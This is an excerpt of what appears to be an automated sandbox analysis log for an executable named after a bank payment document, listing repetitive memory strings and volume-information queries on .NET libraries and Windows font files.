Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq\|Y4
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqXs?
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq<:A
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq`"
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq\9>
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq<u
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqPcC
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq<g
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqPd0
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq #>
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqDK@
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqdJ=
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq<b
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq`C&
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq`A
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqT+#
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq`:
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq`3
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq`5
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq4n+
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqXu/
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqtl(
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq f3
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqDm7
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq`'
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqhT%
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqd:
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq(w2
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqL~6
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq\<"
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqx2<
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq !
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq@<
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq$-&
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq`]
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq`Y
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq\|}'
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq@0
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq,>%
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkqhT?
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq@+
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq`H
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq@(
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq@$
Source: denizbank 25.11.2024 E80 aspc.exe, 00000005.00000002.4215846334.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq`C

Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
